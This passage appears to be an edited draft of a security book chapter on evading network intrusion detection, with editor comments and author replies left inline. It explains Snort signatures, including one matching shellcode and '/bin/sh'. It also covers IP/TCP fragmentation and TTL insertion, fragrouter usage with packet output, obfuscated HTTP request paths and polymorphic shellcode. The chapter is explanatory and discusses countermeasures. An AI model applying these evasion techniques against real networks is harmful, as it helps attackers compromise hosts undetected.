makeup of this signature database that is the Achilles heel of these systems. Attack signatures consist of several components used to uniquely describe an attack. An ideal signature would be one that is specific to the attack while being as simple as possible to match with the input data stream (large complex signatures may pose a serious processing burden). Just as there are varying types of attacks, there must be varying types of signatures. Some signatures will define the characteristics of a single IP option, perhaps that of a nmap portscan, while others will be derived from the actual payload of an attack. Most signatures are constructed by running a known exploit several times, monitoring the data as it appears on the network and looking for a unique pattern that is repeated on every execution. This method works fairly well at ensuring that the signature will consistently match an exploit attemptattempt by that particular exploit. Although I have seen my share of shoddy signatures, some so simplistic in nature that the amazingly hostile activity of browsing a few Websites may set them off, remember the idea is for the unique identification of an attack, not merely the detection of attacks. Tools & Traps?Signature Components The following are Eexample snort Snort signatures: Breaks and indents for wrapping lines OK? Looks good to me. alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 (msg:"SCAN Proxy attempt";flags:S; classtype:attempted-recon; sid:620; rev:1;) alert ip $EXTERNAL_NET any -> $HOME_NET :1023 (msg:"SHELLCODE linux shellcode"; content:"|90 90 90 e8 c0 ff ff ff|/bin /sh"; classtype:attempted-admin; sid:652; rev:2;) alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP CWD ..."; flags:A+; content:"CWD ..."; classtype:bad-unknown; sid:1229 ; rev:1;) alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP traceroute ipopts"; ipopts: rr; itype: 0; classtype: attempted-recon; sid:475; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB- ATTACKS chgrp command attempt"; flags:A+; content:"/usr/bin/ chgrp";nocase; sid:1337; rev:1; classtype:web-application -attack;) Here are some basics of snort signatures. Snort implements a description language used to construct any rule. I’m not going toTo avoid getting into the rather complex details of writing your own signatures, but just point out enough to get us on our way. Llet’s simply go left to right through the examples above and try to discern what exactly theyse mean. We can see that these all define a type of alert. These alerts are then classified into a type of protocol, then the specific details are given, : IP address ($EXTERNAL_NET and $HOME_NET are variables usually defined as 10.10.10.0/24 CIDR style) and port numbers to restrict the scope. The msg keyword defines the message that will be sent out if the rule is matched;, flags will define which of the TCP flags are set in the stream;, just as ipopts dictates the options of an IP packet; and content is used to specify a unique series of data that appears in the actual contents of the packet. In a content field, anything between vertical bars is in hex format, while the rest is ASCII. The first rule watches for any attempt from the outside to connect to an inside host at TCP port 8080, which is a port often used for web proxies. The second rule looks for a commonly-used shellcode sequence inside any IP packet going to a port less than 1024. (The :1023 is shorthand for a range of ports between 0 and 1023, inclusive.) The third rule is checking for a “CWD …” command to TCP port 21, the FTP port. The fourth rule is watching for IP packets with the rr (Record Route) option on. The final rule is checking for the string ?usr/bin/chgrp?going to port 80, the HTTP port. Computing systems, in their most basic abstraction, can be defined as a finite state machine, which literally means that there are only a specific predefined number of states that a system may attain. This crux limitation hinders the IDS in that it can to be only well armed at only a single point in time (i.e. as well armed as the size of its database). First, Hhow can one have foreknowledge of the internal characteristics that make up an intrusion attempt that has not yet occurred? You can’t alert on attacks you’ve never seen before. There Second, there can be only educated guesses that what has happened in the past may again transpire in the future. You can create a signature for a past attack after the fact, but that’s no guarantee you’ll ever see that attack again.,. Third, most an IDS are may be incapable of discerning a new attack from the background white noise of any network. The network utilization may be too high or many false positives cause rules to be diabled.; aAnd finally, it may be incapacitated by even the slightest modification to a known attack. It is ether a weakness in the signature matching process or more fundamentally a weakness in the packet analysis engine (packet sniffing/reconstruction) that will thwart any detection capability. You’re getting too abstract for me to follow here. I don’t follow where you’re going with the state-machine discussion. Are you trying to point out that the external IDS has to model the state of the victim? I think what you’re saying is that 1) You can’t alert on attacks you’ve never seen before, 2) You can create a signature for a past attack after the fact, but that’s no guarantee you’ll ever see that attack again?is 3) relating to anomaly detection? Point 4 is understandable as-is. How about we embed a few of these statements for clairity. The state discussion was just to get the reader accustomed to the idea of state and modeling? The goals of an attacker as it relates to IDS evasion are twofold: To evade detection completely, or to use techniques and methods that will increase the processing load of the IDS sensor significantly. The more methods employed by attackers at large, on a wide scale, the more vendors will be forced to implement more complex signature matching and packet analysis engines. These complex systems will undoubtedly have lower operating throughputs and more opportunities for evasion. The paradox is that the more complex a system becomes, the more opportunities there are for vulnerabilities! Some say the ratio for bugs to code may be as high as 1:1000, and even conservatives say a ratio of 1:10000 may exist. With these sorts of figures in mind, a system of increasing complexity will undoubtedly lead to new levels of increased insecurity. Judging False Positives and Negatives To be an effective tool, an IDS must be able to digest and report information efficiently. A false positive is an event that was triggered that did not actually occur, which may be as innocuous as the download of a signature database (downloading of an IDS signature database may trigger every alarm in the book) or some unusual traffic generated by a networked game. This, although annoying, is usually not of much consequence but can easily happen and is usually tuned down by an initial configuration and burn-in of a Network IDS (NIDS) configuration. However, more dangerous is the possibility for false negatives, which is the failure to alert to an actual event. This would occur in a failure of one of the key functional units of a NIDS. False negatives are the product of a situation in which an attacker modifies their attack payload in order to subvert the detection engine. False positives have a significant impact on the effectiveness of an IDS sensor. If you are charged with the responsibility of monitoring a device, you will find you become accustomed to its typical behavior. If there is a reasonable number of false positives being detected, the perceived urgency of an alert may be diminished by the fact that there are numerous events being triggered on a daily basis that turn into wild goose chases. In the end, all the power of IDS is ultimately controlled by the single judgment call on whether or not to take action. Alert Flooding This problem of making sense of what an IDS reports is apparent again in a flood scenario. Flooding, as you may have guessed, is the process of overloading the IDS by triggering a deluge of alerts. This attack has a number of beneficial actions for an attacker. If the attacker can muster enough firepower in terms of network bandwidth, a Denial of Service (DoS) attack is possible. Many IDS sensors exasperate this condition by the first match (or multiple match) paradox, in which the sensor has to essentially decide whether or not to alert based on the first match in its database or to attempt further matches. The issue here is that an attacker may identify a low-priority or benign signature common to many IDS signature databases and attempt to reproduce this in a more damaging exploit attempt. If the sensor were to use a first match method, it would produce an alert for the less severe vulnerability and not signal to the true nature of the attack. However, in using the multiple match approach, the IDS allows itself to be more vulnerable to alert flooding attacks. The attacker may simply package an entire signature database into some network traffic and watch the IDS crumble to the ground. Aside from the desirable condition of failing an IDS sensor, there is the added bonus of having generated an excessive amount of alerts (in excess of 10,000 is no problem at all) that the admin must then somehow make sense of. The intended target host may be totally lost within a dizzying display of messages, beeps and red flags. Trying to identify a real intrusion event may be arduous at best. Let us not forget the psychological impact of seeing what may be construed as an all-out Internet wide assault on your networking equipment. If this style of attack were to somehow become routine, how effective would your IDS solution be then? Using Packet Level Evasion Are you going to cover Hailstorm here as indicated in the original outline. Not in this portion of text ?but somewhere within this Level One Head Section? I spoke with Ryan about using fragrouter and such in place of Hailstorm. Clicktosecure.com is down and I am unable to get much information about it at this time. Yes, that is correct. Network IDSs have the dubious task of making sense of literally millions of pieces of information per second, analyzing information while providing acceptable response times (typically as close to real-time as possible is desired). To break down the effort of data analysis, a NIDS will function on several discrete layers of the network protocol stack. The first layers under inspection will be the network and transport layers, where the attacker has a great opportunity to confuse, circumvent or eliminate a NIDS sensor. If an attacker were to devise a technique that would enable them to evade detection this would be an ideal location to begin, as all other detection capabilities of the IDS rely on the ability to correctly interpret network traffic just as the target host would. Unfortunately for the defender the characteristics of IP and TCP do not lend themselves to well-defined inspection. These protocols were developed to operate in a dynamic environment, defined by permissive standards that are laden with soft “SHOULD" and "MAY?statements, “MUST?being reserved for all butonly the most basic requirements. This lax definition of protocol standards leads to many complications when an attempt is made to interpret network communications. This will leave the door open for an attacker to desynchronize the state of the IDS, such that it does not correctly assemble traffic in the same manner that the target host will. For example, if an IDS signature was crafted to search for the string “CODE-RED?in any HTTP request, it may be possible for the attacker to fragment his traffic in such a way that it will assemble differently for the IDS as it will for the target host. Therefore, the attacker may exploit the target host without the IDS being able to interpret the event accordingly. Notes from the Underground?TCP/IP Specification Interpretation The difficulties inherent in interpreting the TCP/IP specification is is what also leads to many TCP/IP stack fingerprinting opportunities, . anything Anything from the initial TCP sequence number to packet fragment and options handling characteristics may be used to identify a remote OS. This uniqueness of implementation (nmap has over 300 entries in its nmap-os-fingerprints database) has produced some of the most devastating and complex problems for IDS developers to overcome. How to understandThe challenge of decoding what a particular stream of communications may look to the end host without intimate knowledge of the inner workings of its protocol stack is exceedingly complex. Author: Rephrase for clear grammar in last sidebar sentence. Several years ago a paper was written to discuss the many issues facing NIDS development. Essentially the attacks discussed in 1998 Thomas Ptacek and Timothy Newsham’s published1998 "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection ()", vary in style from insertion to evasion attacks. Insertion and evasion are the basis for evading a signature match. Insertion is the technique which relies upon a situation in whichwhere an IDS will accept some information with the assumption that the target host will also. However, if the IDS does not interpret the network stream in the same manner that the target does, the IDS will have a different understanding of what the communication looks like and will be ineffective in properly alerting to the presence of an attack. The IDS signature will simply not match the data acquired from the network. Our “CODE-RED?example may be seen to the IDS as “CODE-NOT-RED? this I suppose iswhich may be enough for the IDS to feel safe, whereas the target host will actually receive “CODE-RED? having dropped the “NOT?in the middle due to the packet containing it not matching the target’s understanding of the standards.. Evasion is the converse of insertion; where it relies upon a situation in which a target system will accept data that the IDS will ignore. An attack may then look something like “CODE?to the IDS where the target will receive “CODE-RED? These sorts of attacks can be enabled in a number of ways. At any time a TCP/IP communication may be terminated by either party. If the IDS were to incorrectly interpret a RST or FIN from an attacker that was not accepted by the target host (e.g. if the IDS did not correctly monitor sequence numbers), the attacker would be free to communicate with impudence. Denial of Service in IDS implementations is commonplace. The opportunities to subvert the operation of a sensor are quite apparent. System resources are finite; there are only so many pages of memory that can be allocated, ; CPUs are bound and even network IO cards may not be able to maintain consistent throughput despite their speed rating. A Because a computer is a system of queues, some will inevitably fill and spill faster then the data contained may be examined. These issues vary from the micro scale when we are concerned with exhausting the relatively few network IO buffers, to macro issues similar to running low on disk resources. Management of system resources is a complex task that is made exceedingly difficult by requirements to monitor an unknown amount of communication streams and a limited view of the actual internal TCP/IP stack state for each host. IP Options Upon examination of an IP header, there are a number of fields in which, with methodical alteration, some insertion or evasion vulnerabilities will become apparent. Mangling the IP header must be done with care; our traffic must still be valid such that it can be routed across the Internet. Modifying the size of a packet may make it difficult for the IDS to understand where the upper layers of the packet begin (evasion). The IP checksum is another good start; if we can interleave invalid IP packets in our stream, the IDS may accept them as valid (if it does not manually calculate the checksum for every packet) where the end system does not (insertion). Time To Live Attacks In a typical network configuration, a NIDS would most often be placed on the perimeter of a network. This would enable the NIDS to monitor all communication across the Internet. Unfortunately if an attacker is able to traceroute or methodically reduce the Time to Live (TTL) of the traffic to the target and identify the exact amount of hops required to reach the host, they would then be able to send some packets with an insufficient TTL value. This would have the effect of ensuring the packets with a lower TTL would never reach the target system, but would instead be possessed by the IDS as part of the stream, as seen in Figure 16.1. Luckily administrators may be able to combat this attack by configuring their IDS on the same network segment as the hosts they wish to monitor. Figure 16.1 TTL Insertion Attack IP Fragmentation IP fragmentation reassembly is the basis for a number of attacks. If a NIDS sensor does not reassemble IP fragments in a similar fashion as the target host, it will not be able to match the packet to its signature database. In normal network operations, IP fragments will typically arrive in the order in which they are sent. However, this is not always the case; IP supports difficult-to-analyze out-of-order transmission and overlapping fragment reassembly behaviors. Assembling IP fragments can also become complicated by the requirement to keep fragments in memory until the final fragment is received, in order to complete the assembly of the entire packet. This raises yet another DoS issue; many fragments can be transmitted to consume any internal buffers or structures so that the IDS may begin to drop packets or even crash. We can further elaborate on this issue when we add the complexity of internal garbage collection. An IDS listening to the wire may have to account for the sessions of several thousand hosts, whereas each host need only be concerned with its own traffic. A host system may allow an excessive amount of time for fragments to arrive in the stream whereas the IDS may have more aggressive timeouts in order to support the management of an exponentially larger system. If the attacker were to send an attack consisting of three fragments and withhold the final fragment until a significant amount of time has expired, and if the NIDS does not have identical internal fragment management processes (something tells me this is next to impossible to attain), it will not have a consistent view of the IP packet and will therefore be incapacitated from any signature matching processes. Fragmentation Tests A number of tests conducted by Ptacek and Newsham revealed that at the time of testing none of the IDS platforms that were analyzed could properly interpret a number of IP fragmentation issues. The first two tests covered involved an in-order fragmented payload that was sent in two different sizes (8 and 24 bytes). Further testing was done where 8-byte fragments were sent—with one fragment sent out of order (evasion), with a fragment twice (insertion), with all fragments out of order and one duplicate (combination), by sending the fragment marked as the last fragment first (evasion), and by sending a series of fragments that would overlap the previous (evasion). Startling as it may seem, none of the four products (RealSecure, NetRanger, SessionWall and NFR) were able to handle any of the fragmentation attacks. Currently most NIDS have updated their fragmentation assembly engines such that they are capable of reconstructing streams with some degrees of success. TCP Header The TCP header contains a number of fields that are open to exploitation, and so opportunities for evasion and insertion exist if an IDS were not to fully inspect the TCP header. The CODE field defines the type of message being sent for the connection; if someone were to send an invalid combination or a packet missing the ACK flag it would be possible that the target host would reject the packet where the IDS would not (insertion possible). Segments marked as a SYN may also include data; due to the relative infrequent use of this option for data, an IDS may ignore the contents of these types as well (evasion). We can examine many of the fields in the TCP header and look for any opportunity where a target host will either accept traffic that the IDS does not or vice-versa. Another great example is the “Checksum?filed, where if the IDS were not manually calculating the checksum for every TCP segment, we may intermix segments with an invalid checksum into our legitimate session with the hope that the IDS will not validate all segments (the vendor may have assumed the processing overhead too great). TCP recently added a number of new TCP options with RFC 1323, `TCP Extensions for High Performance,'' by V. Jacobson, R. Braden and D. Borman introduce (amongst other things) , Protection Against Wrapped Sequence numbers (PAWS) and the option for non-SYN packets to contain new option flags. This means that if an IDS does not know how a target system may deal with non-SYN packets containing options, there are multiple opportunities for insertion and evasion. The target system may reject this newer form of TCP where the IDS will not, and again the converse is also true. PAWS is a mechanism where a system will have a timestamp associated with each TCP segment. If the target host were to receive a segment with timestamp less then its internal threshold value, it will be dropped. Again and again we see the difficulty with examining TCP data on the wire. There is simply not enough state information transmitted to give an accurate picture of what the behavior will be of a potential target host. I’d love to see a reference to the RFC that covers PAWS here. TCP Synchronization Just as there are a number of attack vectors available against strictly IP communications, when we begin to analyze layers above IP, the added complexity and requirements for functionality produce new synchronization challenges. Today most IDS platforms have implemented “stateful?inspection for TCP. Stateful inspection requires a number of design decisions about how to identify a communication stream when you examine TCP data. An IDS must be capable of reconstruction a stream in an identical manner as the destination host—if it can not, there will be opportunities for an attacker to subvert the analysis engine. The state information for a TCP session is held in a structure known as a TCP Control Block (TCB). A TCB (containing information like source and destination, sequence numbers and current state) will be required for each session that a NIDS will monitor. The three attack vectors that Ptacek and Newsham identified are as follows: TCB creation Stream reassembly TCB teardown. An IDS would have to participate in these processes to identify new sessions, monitor open connections, and to identify when it is appropriate to stop monitoring. TCB Creation Understanding how to begin monitoring a connection poses some interesting challenges. Should the NIDS simply monitor the TCP handshake processes and build a TCB at this time? Can the NIDS effectively establish a TCB for a connection for which it did not see a SYN (connections that were active before the monitor)? There are unique challenges with any technique used to establish a TCB. It would be desirable for the IDS to be able to monitor connections for which it did not see an initial Three Way Handshake (3WH). If not, an attacker could establish a connection and wait a significant amount of time; the IDS may reboot and then be unable to track the already established connection. It is possible to only use ACK packets for TCB creation. This is known as “synching on data''. With the added benefit of being able to identify sessions for which a 3WH has not been inspected. There are a number of drawbacks, one being that the IDS will likely inspect excessive amounts of data as it will not be able to differentiate packets not part of a stream from established connections. Another issue is that syncing on data causes a dependence on accurate sequence number checking. The attacker may be able to desynchronize the IDS by spoofing erroneous data before attempting the attack. An alternate technique to TCB creation is to require a SYN+ACK combination to be seen. This will have the added benefit that it is nearly impossible for the attacker to effect the ACK from the target network. This will enable the IDS to identify which host is the server and client. However, the IDS may be able to be tricked into opening tracking many connections for non-existent hosts (DoS). A SYN+ACK can be easily spoofed without requiring the final ACK from the originating host and care should be taken when relying on this mechanism for TCB creation. A combination of methods is usually the best strategy, building on the strengths while attempting to eliminate the weaknesses of each technique. Stream Reassembly A number of similar issues exist for TCP stream reassembly as for IP fragmentation assembly. The TCP segments may arrive out of order, overlap and possibly be redundant. The IDS must take special care to monitor the sequence numbers of each connection to ensure they do not get desynchronized (difficult to do in a heavily loaded environment). Again, the difficulty with interpreting the possible behavior of the destination host, while not knowing the particulars about its TCP/IP stack implementation, is quite challenging. In the case of a redundant TCP segment, some hosts may retain the older frame, while others may discard in favor of the most recently received. If an IDS hopes to maintain a consistent view of the traffic being evaluated, it must also be weary of the advertised windows size for each connection; this value is often tuned during a session to ensure maximum throughput. If an IDS were to lose sight of the size of the TCP window, it may be vulnerable to an easy insertion attack where the attacker simply sends in excess of the window size, in which case the destination host will simply drop packets that were received outside of its advertised size. TCB Teardown To ensure that a DoS condition does not occur, proper garbage collection must take place. There are some challenges here. Connections may terminate at any time, with or without notice. Some systems may not require RST segments to be properly sequenced. The Internet Control Message Protocol (ICMP) may even terminate a connection; most hosts will respect an ICMP destination unreachable message as an appropriate signal for termination. If the IDS is not aware of these semantics it may become desynchronized and unable to track new connections with similar parameters. There will almost undoubtedly be some timeout for any established connection to prevent some logic error from eventually leaking memory. This will also lead to an attack that we had eludedalluded to earlier. Most hosts do not employ keep-alive messages for all connections. This leaves an IDS in an undesirable position where an attacker may simply wait for an excessive amount of time and possibly simultaneously provoke the IDS to become more aggressive with its garbage collection (by establishing many new connections). If successful, the attacker will be able to send whatever attacks they wish, undetected. Using Fragrouter and Congestant Theory is not enough for some to make a judgment on the performance of security products. We have seen time and time again that many vendors do not heed the warning of the research community. To adequately illustrate the vulnerabilities that NIDS face, Dug Song released fragrouter in September 1999 (). Fragrouter's benefit is that it will enable an attacker to use the same tools and exploits they have always used without modification. Fragrouter functions, as its name suggests, as a sort of fragmenting router. It implements most of the attacks described in the Ptacek and Newsham paper. Congestant is another great tool that implements a number of anti-IDS packet mangling techniques. This is a product ofwas authored by "horizon" and was first released in December 1998 in his paper, “Defeating Sniffers and Intrusion Detection Systems?(www.phrack.org/show.php?p=54&a=10) for phrack 54. The difference here is that congestant Congestant is implemented as a shared library or a kernel patch to OpenBSD. You may find that it is possible to use these tools concurrently for some added confusion for the IDS sensor. Increasing the processing overhead and complexity of IDS sensors is of benefit to an attacker; these systems become more prone to DoS and less likely to perform in an environment of extreme stress (large amount number of packets per second). It is a certainty that there will always be more features and options added to IDSs as they mature, as an attacker will always attempt to identify the critical execution path (the most CPU intensive operation an IDS may make) in attempts to stress an IDS sensor. I’d love to see some detail here. These programs are designed to be pretty transparent. And chance you could print a before-and-after packet going through fragrouter? Here is the output when running fragrouter from a shell, it’s pretty plug-and-play, you just need to ensure that your system will route through the “fragrouter?host to reach the target. storm:~/dl/fragrouter-1.6# ./fragrouter -F5 fragrouter: frag-5: out of order 8-byte fragments, one duplicate truncated-tcp 8 (frag 21150:8@0+) 10.10.42.9 > 10.10.42.3: (frag 21150:8@16+) 10.10.42.9 > 10.10.42.3: (frag 21150:8@8+) 10.10.42.9 > 10.10.42.3: (frag 21150:8@16+) 10.10.42.9 > 10.10.42.3: (frag 21150:4@24) truncated-tcp 8 (frag 57499:8@0+) 10.10.42.9 > 10.10.42.3: (frag 57499:8@8+) 10.10.42.9 > 10.10.42.3: (frag 57499:8@8+) 10.10.42.9 > 10.10.42.3: (frag 57499:4@16) truncated-tcp 8 (frag 57500:8@0+) 10.10.42.9 > 10.10.42.3: (frag 57500:8@8+) 10.10.42.9 > 10.10.42.3: (frag 57500:8@8+) 10.10.42.9 > 10.10.42.3: (frag 57500:4@16) truncated-tcp 8 (frag 58289:8@0+) 10.10.42.9 > 10.10.42.3: (frag 58289:8@8+) 10.10.42.9 > 10.10.42.3: (frag 58289:8@8+) 10.10.42.9 > 10.10.42.3: (frag 58289:4@16) Here is a comparison of what the tcpdump output from the F5 “fragrouter: frag-5: out of order 8-byte fragments, one duplicate?technique would appear against normal traffic. Note the DF (Don’t Fragment) flags on every packet of a normal connection and that the fragrouter stream has several fragmented packets. Before (no fragrouter): 19:36:52.469751 10.10.42.9.32920 > 10.10.42.3.7: S 1180574360:1180574360(0) win 24820 (DF) 19:36:52.469815 10.10.42.9.32920 > 10.10.42.3.7: S 1180574360:1180574360(0) win 24820 (DF) 19:36:52.470822 10.10.42.9.32920 > 10.10.42.3.7: . ack 4206722337 win 24820 (DF) 19:36:52.470841 10.10.42.9.32920 > 10.10.42.3.7: . ack 1 win 24820 (DF) 19:36:53.165813 10.10.42.9.32920 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF) 19:36:53.165884 10.10.42.9.32920 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF) 19:36:53.171968 10.10.42.9.32920 > 10.10.42.3.7: . ack 2 win 24820 (DF) 19:36:53.171984 10.10.42.9.32920 > 10.10.42.3.7: . ack 2 win 24820 (DF) After (with fragrouter): 19:37:29.528452 10.10.42.9.32921 > 10.10.42.3.7: S 1189855959:1189855959(0) win 24820 (DF) 19:37:29.528527 10.10.42.9.32921 > 10.10.42.3.7: S 1189855959:1189855959(0) win 24820 (DF) 19:37:29.529167 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 21150:8@0+) 19:37:29.529532 10.10.42.9.32921 > 10.10.42.3.7: . ack 4211652507 win 24820 (DF) 19:37:29.529564 10.10.42.9.32921 > 10.10.42.3.7: . ack 1 win 24820 (DF) 19:37:29.530293 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 57499:8@0+) 19:37:30.309450 10.10.42.9.32921 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF) 19:37:30.309530 10.10.42.9.32921 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF) 19:37:30.310082 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 57500:8@0+) 19:37:30.316337 10.10.42.9.32921 > 10.10.42.3.7: . ack 2 win 24820 (DF) 19:37:30.316357 10.10.42.9.32921 > 10.10.42.3.7: . ack 2 win 24820 (DF) 19:37:30.316695 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 58289:8@0+) Countermeasures For those wishing to implement NIDS throughout their network infrastructure, fortunately there are some emerging technologies that help eliminate a great many of these lower-layer protocol vulnerabilities. Protocol normalization, as discussed by Mark Handley and Vern Paxson in May 2001 in “Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol Semantics?(), is an attempt to scrub or rewrite network traffic as it enters a destination network. This scrubbing process should eliminate many of the difficulties in reconstructing a consistent view of network traffic. If an IDS and target host were both behind a network protocol scrubber, they would both receive an identical picture of the network traffic. Tools & Traps?Honeynets Recently there has been an upsurge in the use of honeynets as a defensive tool. A honeynet is a system that is deployed with the intended purpose of being compromised. These are hyper defensive tools that can be implemented at any location inside a network. The current best known configuration type for these tools is where two systems are deployed, one for the bait, the other configured to log all traffic. The logging host should be configured as a bridge (invisible to any remote attacker) with sufficient disk space to record all network traffic for later analysis. The system behind the logging host can be configured in any fashion. Most systems are quite simply bait, meaning that they are designed to be the most attractive target on a network segment. It is the hope of the defender that all attackers would see this easy point of presence and target their attacks in that direction. Although it has been seen that there is cause to have bait systems configured identically to other production systems on the target network (hopefully hardened), so that if an attackers presence is detected on the honeynet (nobody can transmit any data to this system without detection), the defender can be sure that there are vulnerabilities in their production configuration. And with the added benefit of detailed logging, some low level forensics will typically reveal the vulnerability information along with any backdoors the intruder used to maintain their foothold. Luckily However, no system is foolproof. Attackers should be able to discern that they are behind a bridge by the lack of layer2 traffic and the discrepancy in Media Access Control (MAC) addresses in the bait systems arp cache. See http://project.honeynet.org for more details. Using Application Protocol Level Evasion IDS sensors have the ability to inspect the protocol internals of a communications stream to aid in the detection process. There are two basic strategies that vendors employ: application protocol decoding, where the IDS will attempt to parse the network input to determine the legitimacy of the service request, and simple signature matching. Both of these approaches have their own unique challenges and benefits; we will see that most IDSs probably implement a hybrid of these solutions. Opportunities to evade detection are available at every layer of the protocol stack. Security as an Afterthought Application developers are typically motivated by features and dollars. We all know that the end user is the ultimate decision maker on the success or failure of software. In an effort to please end users, provide maximum compatibility, and eliminate erroneous conditions, developers make many concessions towardsomit strict compliance of protocol specifications in favor of error correction. It is uncommon for an application to immediately terminate requests upon the first deviation from specified protocols—quite to the contrary, every effort is made to recover from any error in an attempt to service every request possible (thereby maximizing compatibility and possibly increasing interoperability). As security researcher Rain Forest Puppy (known as RFP) stated at the CanSecWest Security Conference 2001, “You would be surprised with what passes for legitimate http traffic…” ?RFP (CanSecWest Security Conference 2001). These practices are the downfall of application security they only serve to aid an attacker in allowing additional latitude in which to operate. That section could be read as either favoring strict compliance, or the opposite. Please re-word to make less ambiguous. Perhaps “developers forego strict compliance…” Also, RFP has a couple of chapters before this one, so you can assume the reader has heard of him by the time they get here. Evading a Match Upgrades, patches and variation of implementation may change the appearance (on the wire) of an application. Signatures, —too specific, too general and just plain too stale, —are thesea basic issues that continues to thwart IDS attack identification efforts. If we look back towards our snort signatures, we can see that quite clearly one of them specifies the complete path name for the chgrp command. This signature is supposed to alert to the execution of some command through a Web server. Any attacker who is aware of the semantics for these rules could easily modify their attack to play any number of tricks in hopes of evading this match. This rule itself is quite specific about the path and name for the chgrp command. We can plainly see that if the command resided in a different directory then /usr/bin, this signature would fail. Also, if the attacker were to simply ensure that their path environment variable were correctly set, they may just issue chgrp, without the complete path to evade a signature match. Should the IDS be configured to alert when any of these variations are present? How many signatures would our IDS have if we were to account for these many variations? Alternate Data Encodings Largely implemented to support multiple languages, the standard text sent between a web client and server may be encoded so that it should be interpreted as Unicode. Unicode gives the capability to represent any known symbol (the Unicode value for Yung is U+6C38). It also presents all new challenges to IDS vendors, as these values must be inspected and converted into ASCII ANSI (American National Standards Institute) for standard processing. This challenge is not that difficult to overcome; most systems implement a practice known as protocol normalization. Protocol normalization will take an input string and digest all known encodings, white space, and any protocol-specific delimiters in an attempt to produce the most basic form of the input. Did you mean ASCII? Yes Unfortunately all of the normalizations imaginable cannot overcome the challenge of monitoring closed source software packages. Without detailed information of the inner workings of a system there can be no accounting for undocumented nonstandard features. IIS had one such “special-feature:?%u#### encoding was allowed as an alternate to the normal Unicode encodings (%####). The famed “Code Red?worm had used this previously unknown technique to bypass many IDS signatures tuned to match for the specific .ida buffer overflow vulnerability. Lack of information is the worst enemy of a network defender. Consider the following imaginary attack: Attack String: GET /vulnerable.cgi?ATTACK=exploit-code Signature: alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-ATTACKS vulnerable.cgi attempt"; flags:A+; content:"get /vulnerable.cgi?ATTACK=exploit-code";nocase; sid:1337; rev:1; classtype:web-application-attack;) Modified Attack String: GET /vulnerable.cgi?ATTACK=exploit-code The attack here seems to exploit some Common Gateway Interface (CGI) application, and a simple signature is developed to alert to the known vulnerability. This signature would provide a very high level assurance that there would be relatively few false positives, as the exploit-code is embedded right into the signature. However, we can see that if the attacker were able to send a modified attack string, through the use of some additional white space, they should be able to bypass a signature match. This exercise again illustrates the difficulty of signature development. If the signature left out the portion of the exploit code, there may be a great number of false positives, whereas if they embed some of the exploit code, the chance for evasion is greatly increased. This is an incredibly simplistic example and is not that difficult to overcome. Adequate normalizations should be able to eliminate white space and allow for a signature match. Web Attack Techniques A number of Web attack issues have been analyzed by RFP; see for instance “A look at whisker's anti-IDS tactics?from December 1999 () He has implemented a number of them into his whisker vulnerability scanner. We'll take a look at some of them in the following sections. Since RFP is working on this book ?he should probably take a look at this section. From past experience I like him to look at what people are writing about him. THX. Ryan has sent the chapter to RFP. Method Matching The method of a HTTP request informs the server what type of connection to anticipate (GET, HEAD, POST, etc). RFP found that many IDS signatures had completely failed to recognize any other methods. This is a somewhat depressing fact as many IDS vendors claim to be not totally dependent on signature matching to generate an alert. Directory and File Referencing A slash, the character that specifies a separation between directory and file names (/), can be represented in a couple of different ways. The simplest form is double or multiple slashes (/some//file.html = /some////file.html). These tricks will fool the simplest signature matches, providing there are no normalizations to counteract. Another form of the same trick (this works only on IIS Web servers), is to use the DOS slash character (\). If an IDS were not aware of this convention, it would not be able to generate a match. These tricks work because they can reference a file by a different pathname. Amazingly enough, resolving a pathname is substantially harder then you would think (this is what has lead to a number of remote compromises in IIS, remember Unicode). Dot, the path to the current directory, and double dot, the path to the previous directory, can be used to obfuscate a file reference. An attacker may only need to use his or her imagination in constructing unique paths; all of these are equivalent requests: GET /some/file.cgi HTTP/1.0 GET /.././some////file.cgi HTTP/1.0 GET /./some//..\..///some/./file.cgi HTTP/1.0 A form of the aforementioned evasions is what RFP calls parameter hiding. This evasion is based on the assumption that some IDSs may only evaluate a request until it encounters a question mark (?) , a hex-encoded value of %3f). This character is typically what will denote that any further parameters are arguments to a Web application. If the IDS simply wanted to alert to the request of a file, it may not fully evaluate the expression. The following two requests are equivalent: GET /real.file HTTP/1.0 GET /%3f/file/does/not/exist/../../../../../real.file HTTP/1.0 Countermeasures As discussed previously, a signature based IDS may be able to normalize the communications stream. That is, as it inputs data destined for a HTTP server, it should apply some logic to reduce the input into its lowest common denominator (a single /, or resolving directory references). Partial signature matches may also help, if a sensor does not enforce a strong 100% match, they should be able to account for some variation of many exploit types. Using Code Morphing Evasion Polymorphism is the ability to exist in multiple forms, and morphing is the processes that is used to achieve polymorphism. The objective of polymorphic code is to retain the same functional properties while existing in a structurally unique form. A NIDS has only the opportunity to inspect information as it exists on the wire; this would then only allow the structure of the exploit to be inspected. This feature had allowed viruses to remain undetected for quite some time. The only difference is that a virus scanner has the opportunity to inspect disk files instead of network data. The way that most virus scanning engines have tackled this problem is through the use of heuristic scanning techniques; this is similar to what a host based IDS would do (identifying suspicious events, inappropriate file access). Polymorphism is achieved through taking the original attack payload and encoding it with some form of a reversible algorithm. All of the nop-sled instructions are substituted with suitable replacements. This encoded payload is then sent over the network with a small decoding function prefixed (this decoder is also dynamically generated to avoid a signature match). When the exploit runs on the target, the decoder will unwrap the original payload and execute it. This way, the original functionality is maintained. nop-sled? Yup, check out the buffer-overflow chapter. Polymorphic shellcode is discussed thoroughly in this author's paper that was released in early 2001 (). An engine is included for use in any current or future vulnerabilities. The basis for polymorphic code generation is that there is always more then one way to calculate a value. If, to exploit a vulnerability, we had to calculate the value of 4, we could do any of 2+2, 